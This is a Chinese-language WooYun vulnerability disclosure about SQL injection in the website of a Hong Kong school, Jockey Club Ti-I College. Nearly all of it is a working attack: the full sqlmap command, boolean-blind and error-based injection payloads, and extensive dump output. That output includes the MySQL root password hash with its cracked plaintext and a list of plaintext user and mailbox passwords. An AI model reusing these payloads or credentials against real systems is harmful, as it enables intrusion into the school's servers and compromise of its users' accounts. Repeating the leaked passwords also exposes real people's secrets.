Jockey Club Ti-I College主站存在SQL注射漏洞（DBA权限+root密码+1000多W网站访问记录+用户明文密码）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157374

漏洞标题：Jockey Club Ti-I College主站存在SQL注射漏洞（DBA权限+root密码+1000多W网站访问记录+用户明文密码）（香港地區）

漏洞作者：路人甲

提交时间：2015-12-03 11:27

修复时间：2015-12-08 11:28

公开时间：2015-12-08 11:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-03：细节已通知厂商并且等待厂商处理中
2015-12-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

Jockey Club Ti-I College主站存在SQL注射漏洞（DBA权限+root密码+1000多W网站访问记录+用户明文密码）

详细说明：

地址：http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480

$ python sqlmap.py -u "http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480" -p refid --technique=BE --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --cunt --search -C pass --output-dir=output

current user:    'root@localhost'
current user is DBA:    True
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] root [2]:
    password hash: *0CB5F227B3E98395CA0C6F1427427E77ADF49F89
    clear-text password: 1234qwer
    password hash: NULL

Database: itschool
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| webcms_counter                        | 16140429 |
Database: itschool
Table: webcms_counter
[4 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| countid   | int(11)     |
| ip        | varchar(20) |
| visitday  | date        |
| visittime | time        |
+-----------+-------------+

Database: itschool
Table: ituser
[13 entries]
+--------------+
| password     |
+--------------+
| 1234         |
| 1qa3ed5tg    |
| 321          |
| 321          |
| 6ymrrrzm     |
| gmnngmg3     |
| itschool     |
| killyouyeah1 |
| ltc          |
| road2002     |
| test01_t     |
| z3459315     |
| z8322822     |
+--------------+

漏洞证明：

---
Parameter: refid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: refid=1104 RLIKE (SELECT (CASE WHEN (8072=8072) THEN 1104 ELSE 0x28 END))&mode=published&lang=en&nocache1402373480
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: refid=1104 AND (SELECT 8375 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(8375=8375,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=published&lang=en&nocache1402373480
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] root [2]:
    password hash: *0CB5F227B3E98395CA0C6F1427427E77ADF49F89
    clear-text password: 1234qwer
    password hash: NULL
Database: itschool
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| webcms_counter                        | 16140429 |
| photo                                 | 5414    |
| logbook                               | 2017    |
| webcms_item_component                 | 399     |
| webcms_page_temp_template             | 359     |
| webcms_page_temp_content              | 342     |
| webcms_page_content                   | 334     |
| webcms_latest_news                    | 255     |
| webcms_page_template                  | 247     |
| ecard_datafile                        | 246     |
| webcms_item_page_status               | 239     |
| privilege                             | 184     |
| webcms_items                          | 184     |
| menuitem                              | 149     |
| ecard                                 | 118     |
| mingpao_prize                         | 106     |
| page_privilege                        | 101     |
| actionlog                             | 81      |
| mingpao_news_forum_word_filter        | 71      |
| mingpao_usergroup_privilege           | 69      |
| webcms_remarks                        | 69      |
| photoalbum                            | 67      |
| webcms_upload_files                   | 57      |
| myid_module                           | 51      |
| webcms_link_content                   | 46      |
| webcms_page_content_list              | 45      |
| webcms_latest_news_attachment         | 35      |
| menucat                               | 30      |
| usergroup_privilege                   | 25      |
| mingpao_engine_rule                   | 24      |
| sch_leave                             | 21      |
| webcms_album                          | 20      |
| myit_schoolsubject                    | 18      |
| webcms_waiting_publish                | 17      |
| mingpao_scoring                       | 16      |
| webcms_template_detail                | 16      |
| mingpao_rank                          | 15      |
| ecard_type                            | 13      |
| ituser                                | 13      |
| user_usergroup                        | 13      |
| userlog                               | 13      |
| userprofile                           | 13      |
| webcms_top_banner                     | 13      |
| changjie_certificate                  | 12      |
| mingpao_privilege                     | 12      |
| parent_notice_questionnaire           | 12      |
| rss_reader_user                       | 12      |
| webcms_cal                            | 12      |
| webcms_mini_banner                    | 12      |
| webcms_newbanner                      | 12      |
| changjie_level                        | 10      |
| mingpao_news_forum_face               | 10      |
| webcms_indexbannerslide               | 10      |
| sch_leavecat                          | 9       |
| webcms_template_info                  | 8       |
| changjie_user_grade                   | 6       |
| mail_folder                           | 6       |
| mail_restrict_recipient_permission    | 6       |
| mingpao_box_myid_link                 | 6       |
| mingpao_news_type                     | 6       |
| mingpao_user_read_level               | 6       |
| photoalbum_lastview                   | 6       |
| resdb_url                             | 6       |
| usergroup                             | 6       |
| wid_template                          | 6       |
| changjie_mission                      | 5       |
| tvs_channel_template                  | 5       |
| imap_mailbox                          | 4       |
| mingpao_box                           | 4       |
| mingpao_usergroup                     | 4       |
| parent_notice                         | 4       |
| webcms_schdirection                   | 4       |
| webcms_schdocument                    | 4       |
| changjie_settings                     | 3       |
| mingpao_news_forum_topic_template     | 3       |
| mingpao_read_level                    | 3       |
| myid_lock_status                      | 3       |
| myid_msg_centre_module_setting        | 3       |
| mysql_sessions                        | 3       |
| parent_notice_file                    | 3       |
| sch_leaveapplicationform              | 3       |
| webcms_motto_of_this_week             | 3       |
| webcms_motto_of_this_week1            | 3       |
| changjie_grade                        | 2       |
| changjie_notice                       | 2       |
| frontpagenotice_read_record           | 2       |
| linuxsys_useraccountquota             | 2       |
| login_language_type                   | 2       |
| parent_news_group                     | 2       |
| parent_notice_content                 | 2       |
| parent_notice_read                    | 2       |
| parent_notice_users                   | 2       |
| parent_notice_users_alias             | 2       |
| photoalbum_quota                      | 2       |
| resdb_readonly                        | 2       |
| sch_semester                          | 2       |
| school_calendar                       | 2       |
| webcms_main_banner                    | 2       |
| webcms_public_newsboard               | 2       |
| attend_basic_info                     | 1       |
| attend_pic                            | 1       |
| attend_smart_final_record             | 1       |
| cal_preference                        | 1       |
| disforum_cat                          | 1       |
| disforum_forum                        | 1       |
| disforum_master                       | 1       |
| disforum_privilege                    | 1       |
| mailsize                              | 1       |
| mingpao_student_box                   | 1       |
| mingpao_user                          | 1       |
| myit_modulefunction                   | 1       |
| newscategory                          | 1       |
| parent_news                           | 1       |
| parent_news_read                      | 1       |
| parent_news_read_record               | 1       |
| parent_notice_user_reply              | 1       |
| perdb_quota                           | 1       |
| perhp_quota                           | 1       |
| resdb_admin                           | 1       |
| resdb_folder                          | 1       |
| resdbgroup_quota                      | 1       |
| resource_setting                      | 1       |
| rss_reader                            | 1       |
| sch_info                              | 1       |
| sch_year                              | 1       |
| tvs_mode                              | 1       |
| tvs_setting                           | 1       |
| user_widget                           | 1       |
| webcms_honor_list                     | 1       |
| webcms_message_announce               | 1       |
| webcms_weekly_message                 | 1       |
| wid_setting                           | 1       |
| ws_ticket                             | 1       |
+---------------------------------------+---------+
Database: itschool_bak
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| photo                                 | 16663   |
| webcms_counter                        | 6755    |
| ecard_datafile                        | 246     |
| photoalbum                            | 233     |
| webcms_item_component                 | 217     |
| webcms_page_temp_template             | 192     |
| webcms_page_temp_content              | 190     |
| webcms_page_content                   | 185     |
| privilege                             | 184     |
| menuitem                              | 149     |
| ecard                                 | 118     |
| webcms_page_template                  | 107     |
| mingpao_prize                         | 106     |
| usergroup_privilege                   | 105     |
| page_privilege                        | 101     |
| webcms_items                          | 98      |
| webcms_latest_news                    | 96      |
| mingpao_news_forum_word_filter        | 71      |
| mingpao_usergroup_privilege           | 69      |
| webcms_upload_files                   | 57      |
| myid_module                           | 51      |
| webcms_remarks                        | 48      |
| webcms_page_content_list              | 45      |
| menucat                               | 30      |
| webcms_link_content                   | 25      |
| mingpao_engine_rule                   | 24      |
| sch_leave                             | 21      |
| webcms_latest_news_attachment         | 21      |
| myit_schoolsubject                    | 18      |
| mingpao_scoring                       | 16      |
| mingpao_rank                          | 15      |
| logbook                               | 14      |
| webcms_template_detail                | 14      |
| ecard_type                            | 13      |
| changjie_certificate                  | 12      |
| mingpao_privilege                     | 12      |
| rss_reader_user                       | 12      |
| webcms_album                          | 12      |
| webcms_cal                            | 12      |
| webcms_mini_banner                    | 12      |
| changjie_level                        | 10      |
| mingpao_news_forum_face               | 10      |
| webcms_indexbannerslide               | 10      |
| photoalbum_lastview                   | 9       |
| sch_leavecat                          | 9       |
| webcms_newbanner                      | 9       |
| webcms_template_info                  | 8       |
| changjie_user_grade                   | 6       |
| mail_folder                           | 6       |
| mail_restrict_recipient_permission    | 6       |
| mingpao_box_myid_link                 | 6       |
| mingpao_news_type                     | 6       |
| mingpao_user_read_level               | 6       |
| resdb_url                             | 6       |
| usergroup                             | 6       |
| wid_template                          | 6       |
| changjie_mission                      | 5       |
| tvs_channel_template                  | 5       |
| webcms_top_banner                     | 5       |
| imap_mailbox                          | 4       |
| mingpao_box                           | 4       |
| mingpao_usergroup                     | 4       |
| webcms_schdirection                   | 4       |
| webcms_schdocument                    | 4       |
| changjie_settings                     | 3       |
| mingpao_news_forum_topic_template     | 3       |
| mingpao_read_level                    | 3       |
| myid_lock_status                      | 3       |
| sch_leaveapplicationform              | 3       |
| webcms_motto_of_this_week             | 3       |
| webcms_motto_of_this_week1            | 3       |
| changjie_grade                        | 2       |
| changjie_notice                       | 2       |
| ituser                                | 2       |
| linuxsys_useraccountquota             | 2       |
| login_language_type                   | 2       |
| resdb_readonly                        | 2       |
| school_calendar                       | 2       |
| user_usergroup                        | 2       |
| webcms_main_banner                    | 2       |
| webcms_public_newsboard               | 2       |
| webcms_waiting_publish                | 2       |
| attend_basic_info                     | 1       |
| attend_pic                            | 1       |
| attend_smart_final_record             | 1       |
| disforum_cat                          | 1       |
| disforum_forum                        | 1       |
| disforum_master                       | 1       |
| disforum_privilege                    | 1       |
| mailsize                              | 1       |
| mingpao_student_box                   | 1       |
| mingpao_user                          | 1       |
| myit_modulefunction                   | 1       |
| newscategory                          | 1       |
| perdb_quota                           | 1       |
| perhp_quota                           | 1       |
| photoalbum_quota                      | 1       |
| resdb_admin                           | 1       |
| resdb_folder                          | 1       |
| resdbgroup_quota                      | 1       |
| resource_setting                      | 1       |
| rss_reader                            | 1       |
| tvs_mode                              | 1       |
| tvs_setting                           | 1       |
| user_widget                           | 1       |
| userlog                               | 1       |
| userprofile                           | 1       |
| webcms_honor_list                     | 1       |
| webcms_message_announce               | 1       |
| webcms_weekly_message                 | 1       |
| wid_setting                           | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 13634   |
| STATISTICS                            | 4256    |
| KEY_COLUMN_USAGE                      | 3307    |
| TABLES                                | 2505    |
| PARTITIONS                            | 2504    |
| TABLE_CONSTRAINTS                     | 2229    |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| USER_PRIVILEGES                       | 83      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 32      |
| PROCESSLIST                           | 20      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 5       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1009    |
| help_topic                            | 510     |
| help_keyword                          | 453     |
| help_category                         | 40      |
| `user`                                | 5       |
| db                                    | 2       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: itschool
Table: imap_mailbox
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: itschool
Table: alumni_waiting_approval_user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: itschool
Table: qbankexecrise
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: linuxsys_useraccountquota
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| linuxPassword | varchar(50) |
+---------------+-------------+
Database: itschool
Table: ecpstestex
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| passingmark | int(11) |
+-------------+---------+
Database: itschool
Table: delete_user_pool
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: itschool
Table: ytcps_net_reading_passage_circle
[3 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| passage_dttm     | datetime |
| passage_dttm_end | datetime |
| passage_id       | int(11)  |
+------------------+----------+
Database: itschool
Table: ecpstestex_temp
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| passingmark | int(11) |
+-------------+---------+
Database: itschool
Table: qbankqpaper_temp
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: qbankqpaper
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: qbankdoconlinetest_temp
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: qbankdoconlinetest
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: ytcps_net_reading_passage_content
[1 column]
+------------+---------+
| Column     | Type    |
+------------+---------+
| passage_id | int(11) |
+------------+---------+
Database: itschool
Table: ers_reading_book_map
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: ituser
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: itschool
Table: ytcps_net_reading_paper
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| passingmark | int(11) |
+-------------+---------+
Database: itschool
Table: itpark_levels
[1 column]
+----------------+------------+
| Column         | Type       |
+----------------+------------+
| passing_points | tinyint(4) |
+----------------+------------+
Database: itschool
Table: alumni_user_info
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: itschool
Table: ytcps_net_reading_passage
[1 column]
+------------+---------+
| Column     | Type    |
+------------+---------+
| passage_id | int(11) |
+------------+---------+
Database: itschool
Table: mail_external_filter_log
[1 column]
+--------+---------+
| Column | Type    |
+--------+---------+
| pass   | int(11) |
+--------+---------+
Database: itschool
Table: ex_school
[1 column]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| db_password | varchar(255) |
+-------------+--------------+
Database: itschool
Table: flashchirecords
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| passed | enum('Y','N') |
+--------+---------------+
Database: itschool
Table: ers_reading_paper
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool
Table: perdbfolder
[1 column]
+----------+------------+
| Column   | Type       |
+----------+------------+
| password | varchar(8) |
+----------+------------+
Database: itschool
Table: linuxsys_server
[3 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| passwd     | varchar(50) |
| password   | varchar(50) |
| suPassword | varchar(50) |
+------------+-------------+
Database: itschool
Table: ers_reading_report
[1 column]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| is_passed | char(1) |
+-----------+---------+
Database: itschool
Table: ytcps_net_reading_report
[1 column]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| is_passed | char(1) |
+-----------+---------+
Database: itschool_bak
Table: imap_mailbox
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: itschool_bak
Table: alumni_waiting_approval_user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: itschool_bak
Table: qbankexecrise
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: linuxsys_useraccountquota
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| linuxPassword | varchar(50) |
+---------------+-------------+
Database: itschool_bak
Table: ecpstestex
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| passingmark | int(11) |
+-------------+---------+
Database: itschool_bak
Table: delete_user_pool
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: itschool_bak
Table: ytcps_net_reading_passage_circle
[3 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| passage_dttm     | datetime |
| passage_dttm_end | datetime |
| passage_id       | int(11)  |
+------------------+----------+
Database: itschool_bak
Table: ecpstestex_temp
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| passingmark | int(11) |
+-------------+---------+
Database: itschool_bak
Table: qbankqpaper_temp
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: qbankqpaper
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: qbankdoconlinetest_temp
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: qbankdoconlinetest
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: ytcps_net_reading_passage_content
[1 column]
+------------+---------+
| Column     | Type    |
+------------+---------+
| passage_id | int(11) |
+------------+---------+
Database: itschool_bak
Table: ers_reading_book_map
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: ituser
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: itschool_bak
Table: ytcps_net_reading_paper
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| passingmark | int(11) |
+-------------+---------+
Database: itschool_bak
Table: itpark_levels
[1 column]
+----------------+------------+
| Column         | Type       |
+----------------+------------+
| passing_points | tinyint(4) |
+----------------+------------+
Database: itschool_bak
Table: alumni_user_info
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: itschool_bak
Table: ytcps_net_reading_passage
[1 column]
+------------+---------+
| Column     | Type    |
+------------+---------+
| passage_id | int(11) |
+------------+---------+
Database: itschool_bak
Table: mail_external_filter_log
[1 column]
+--------+---------+
| Column | Type    |
+--------+---------+
| pass   | int(11) |
+--------+---------+
Database: itschool_bak
Table: ex_school
[1 column]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| db_password | varchar(255) |
+-------------+--------------+
Database: itschool_bak
Table: flashchirecords
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| passed | enum('Y','N') |
+--------+---------------+
Database: itschool_bak
Table: ers_reading_paper
[1 column]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| passingmark | float |
+-------------+-------+
Database: itschool_bak
Table: perdbfolder
[1 column]
+----------+------------+
| Column   | Type       |
+----------+------------+
| password | varchar(8) |
+----------+------------+
Database: itschool_bak
Table: linuxsys_server
[3 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| passwd     | varchar(50) |
| password   | varchar(50) |
| suPassword | varchar(50) |
+------------+-------------+
Database: itschool_bak
Table: ers_reading_report
[1 column]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| is_passed | char(1) |
+-----------+---------+
Database: itschool_bak
Table: ytcps_net_reading_report
[1 column]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| is_passed | char(1) |
+-----------+---------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: itschool
Table: imap_mailbox
[4 entries]
+-----------+
| password  |
+-----------+
|           |
|           |
| 4rf6yh8ik |
| itschool  |
+-----------+
Database: itschool
Table: alumni_waiting_approval_user
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool
Table: qbankexecrise
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: linuxsys_useraccountquota
[2 entries]
+---------------+
| linuxPassword |
+---------------+
| 4rf6yh8ik     |
| itschool      |
+---------------+
Database: itschool
Table: delete_user_pool
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool
Table: ecpstestex
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: ytcps_net_reading_passage_circle
[0 entries]
+--------------+------------------+------------+
| passage_dttm | passage_dttm_end | passage_id |
+--------------+------------------+------------+
+--------------+------------------+------------+
Database: itschool
Table: ecpstestex_temp
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: qbankqpaper_temp
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: qbankqpaper
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: qbankdoconlinetest_temp
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: qbankdoconlinetest
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: ytcps_net_reading_passage_content
[0 entries]
+------------+
| passage_id |
+------------+
+------------+
Database: itschool
Table: ers_reading_book_map
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: ituser
[13 entries]
+--------------+
| password     |
+--------------+
| 1234         |
| 1qa3ed5tg    |
| 321          |
| 321          |
| 6ymrrrzm     |
| gmnngmg3     |
| itschool     |
| killyouyeah1 |
| ltc          |
| road2002     |
| test01_t     |
| z3459315     |
| z8322822     |
+--------------+
Database: itschool
Table: ytcps_net_reading_paper
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: itpark_levels
[0 entries]
+----------------+
| passing_points |
+----------------+
+----------------+
Database: itschool
Table: alumni_user_info
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool
Table: ytcps_net_reading_passage
[0 entries]
+------------+
| passage_id |
+------------+
+------------+
Database: itschool
Table: mail_external_filter_log
[0 entries]
+------+
| pass |
+------+
+------+
Database: itschool
Table: ex_school
[0 entries]
+-------------+
| db_password |
+-------------+
+-------------+
Database: itschool
Table: flashchirecords
[0 entries]
+--------+
| passed |
+--------+
+--------+
Database: itschool
Table: ers_reading_paper
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool
Table: perdbfolder
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool
Table: linuxsys_server
[0 entries]
+--------+----------+------------+
| passwd | password | suPassword |
+--------+----------+------------+
+--------+----------+------------+
Database: itschool
Table: ers_reading_report
[0 entries]
+-----------+
| is_passed |
+-----------+
+-----------+
Database: itschool
Table: ytcps_net_reading_report
[0 entries]
+-----------+
| is_passed |
+-----------+
+-----------+
Database: itschool_bak
Table: imap_mailbox
[4 entries]
+-----------+
| password  |
+-----------+
|           |
|           |
| 4rf6yh8ik |
| itschool  |
+-----------+
Database: itschool_bak
Table: alumni_waiting_approval_user
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool_bak
Table: qbankexecrise
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: linuxsys_useraccountquota
[2 entries]
+---------------+
| linuxPassword |
+---------------+
| 4rf6yh8ik     |
| itschool      |
+---------------+
Database: itschool_bak
Table: delete_user_pool
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool_bak
Table: ecpstestex
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: ytcps_net_reading_passage_circle
[0 entries]
+--------------+------------------+------------+
| passage_dttm | passage_dttm_end | passage_id |
+--------------+------------------+------------+
+--------------+------------------+------------+
Database: itschool_bak
Table: ecpstestex_temp
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: qbankqpaper_temp
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: qbankqpaper
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: qbankdoconlinetest_temp
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: qbankdoconlinetest
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: ytcps_net_reading_passage_content
[0 entries]
+------------+
| passage_id |
+------------+
+------------+
Database: itschool_bak
Table: ers_reading_book_map
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: ituser
[2 entries]
+-----------+
| password  |
+-----------+
| 1qa3ed5tg |
| itschool  |
+-----------+
Database: itschool_bak
Table: ytcps_net_reading_paper
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: itpark_levels
[0 entries]
+----------------+
| passing_points |
+----------------+
+----------------+
Database: itschool_bak
Table: alumni_user_info
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool_bak
Table: ytcps_net_reading_passage
[0 entries]
+------------+
| passage_id |
+------------+
+------------+
Database: itschool_bak
Table: mail_external_filter_log
[0 entries]
+------+
| pass |
+------+
+------+
Database: itschool_bak
Table: ex_school
[0 entries]
+-------------+
| db_password |
+-------------+
+-------------+
Database: itschool_bak
Table: flashchirecords
[0 entries]
+--------+
| passed |
+--------+
+--------+
Database: itschool_bak
Table: ers_reading_paper
[0 entries]
+-------------+
| passingmark |
+-------------+
+-------------+
Database: itschool_bak
Table: perdbfolder
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: itschool_bak
Table: linuxsys_server
[0 entries]
+--------+----------+------------+
| passwd | password | suPassword |
+--------+----------+------------+
+--------+----------+------------+
Database: itschool_bak
Table: ers_reading_report
[0 entries]
+-----------+
| is_passed |
+-----------+
+-----------+
Database: itschool_bak
Table: ytcps_net_reading_report
[0 entries]
+-----------+
| is_passed |
+-----------+
+-----------+
Database: mysql
Table: user
[5 entries]
+------------------------------------------------------+
| Password                                             |
+------------------------------------------------------+
| *0CB5F227B3E98395CA0C6F1427427E77ADF49F89 (1234qwer) |
|
|
|
|
+------------------------------------------------------+
Database: mysql
Table: servers
[0 entries]
+----------+
| Password |
+----------+
+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: refid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: refid=1104 RLIKE (SELECT (CASE WHEN (8072=8072) THEN 1104 ELSE 0x28 END))&mode=published&lang=en&nocache1402373480
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: refid=1104 AND (SELECT 8375 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(8375=8375,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=published&lang=en&nocache1402373480
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: itschool
Table: webcms_counter
[4 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| countid   | int(11)     |
| ip        | varchar(20) |
| visitday  | date        |
| visittime | time        |
+-----------+-------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-08 11:28

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157374

漏洞标题：Jockey Club Ti-I College主站存在SQL注射漏洞（DBA权限+root密码+1000多W网站访问记录+用户明文密码）（香港地區）

相关厂商：Jockey Club Ti-I College

漏洞作者：路人甲

提交时间：2015-12-03 11:27

修复时间：2015-12-08 11:28

公开时间：2015-12-08 11:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

